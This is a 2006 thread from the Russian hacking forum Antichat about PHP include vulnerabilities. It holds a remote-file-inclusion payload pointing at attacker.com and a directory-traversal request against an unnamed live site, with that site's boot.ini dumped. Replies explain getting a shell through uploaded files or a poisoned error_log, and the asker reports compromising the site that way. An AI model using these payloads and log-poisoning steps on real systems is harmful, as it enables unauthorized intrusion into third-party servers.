Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.12.2006, 01:01
|
|
Новичок
Регистрация: 27.11.2006
Сообщений: 3
Провел на форуме:
5286
Репутация:
0
|
|
Вопрос о PHP-инклюдинге
Если скрипт воспринимает только одну переменную методом GET, и обрабатывает ее следующим способом:
PHP код:
if ($a=="abc"){include "abcd.php";}
if ($a=="asd"){include "qwe.php";}
все, больше никаких действий с этой переменной не производится |
|
|
04.12.2006, 01:04
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
нет.
|
|
|
|
04.12.2006, 01:06
|
|
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310
Репутация:
488
|
|
Возможен. проиклудятся файлы: qwe.php || abcd.php . =}
|
|
|
|
04.12.2006, 01:11
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Баги только там, где ты можешь повлиять на аргументы функций include и подобных.
Тут аргумент - строка, менять которую ты не можешь
|
|
|
|
04.12.2006, 01:31
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
Бажный пример:
Код:
if ($exec=='main.php' && file_exists("$themedir/main.php"))
include "$themedir/main.php";
else include $exec;
index.php?exec=http://attacker.com/evilcode.txt? |
|
|
|
07.12.2006, 12:44
|
|
Новичок
Регистрация: 05.09.2006
Сообщений: 15
Провел на форуме:
72328
Репутация:
5
|
|
В продолжении темы...
Есть бажный срипт, который позволяет подключать любые локальные файлы. Можно шелл сделать там?
http:*/нискажу-сайт.com/бажный-скрипт.php?str=../../../../../../boot.ini
Код HTML:
[boot loader] timeout=0 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard RU" /noexecute=optout /fastdetect
|
|
|
|
07.12.2006, 15:26
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
при наличии локального инклуда шелл можно сделать так:
Залить на сайт (если есть форма где-то) файл любого типа с шелл-ным содержанием,а потом через проинклудить его..выполнится код =) Или оставляем злой запрос в еррор_лог-е и путем ручного перебора пути инклудим еррор_лог =)
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
07.12.2006, 16:24
|
|
Новичок
Регистрация: 05.09.2006
Сообщений: 15
Провел на форуме:
72328
Репутация:
5
|
|
На счет заливания аватара с "хитрым" содержимым я догадался, там стоит vbulletin 3.5.4, не могу найти куда льет...
А на счет error.log это спасибо... пример запроса бы еще, буду премного благодарен.
|
|
|
|
07.12.2006, 16:53
|
|
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362
Репутация:
175
|
|
Вбуллитин льет в базу, а не в файловую систему.
Посмотри пути к аватаркам, вложениями, и прочему на форуме. Админ мог переключить настройки в файловую систему, тогда, возможно, прокатит. Но ВБ - форум не дурак. Он вроде как содержимое вкладываемых файлов смотрит (могу ошибаться.)
|
|
|
|
07.12.2006, 19:08
|
|
Новичок
Регистрация: 05.09.2006
Сообщений: 15
Провел на форуме:
72328
Репутация:
5
|
|
Проинклудил через лог  всем спасибо
зы InetCrack - вещь!  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
